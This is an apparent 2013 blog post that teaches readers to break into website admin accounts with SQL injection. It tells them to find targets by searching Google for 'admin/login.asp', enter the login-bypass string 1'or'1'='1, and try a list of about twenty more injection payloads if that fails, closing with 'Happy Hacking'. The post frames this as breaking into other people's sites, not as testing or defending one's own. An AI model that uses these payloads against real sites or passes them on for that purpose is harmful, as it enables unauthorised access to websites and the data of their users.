Thursday, August 15, 2013

Hello I am going to tell about one very useful but old method which you can used to hack website using Basic SQL Injection Attack. We're gonna hack into an admin account, using SQL injections. How does it work?? A SQL injection injects a code into the MYSQL database which gets passed the site security login.

Hack Website Admin Account | Basic SQL Injection Attack

Step 1: Go to Google, typ in ''admin/login.asp'' and search (You can also use the option, to search only in your country).

As you already can see in the first picture, we are looking for websites that look like this: example ''''.

Step 2: Go to the website admin login page, typ in:

Username : 1'or'1'='1
Password : 1'or'1'='1
Well done!! Your now logged in as ADMIN:

If it's not working, I've listed other possible injections below. Type these in under ''Password''.

List of injections:
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Happy Hacking.. :)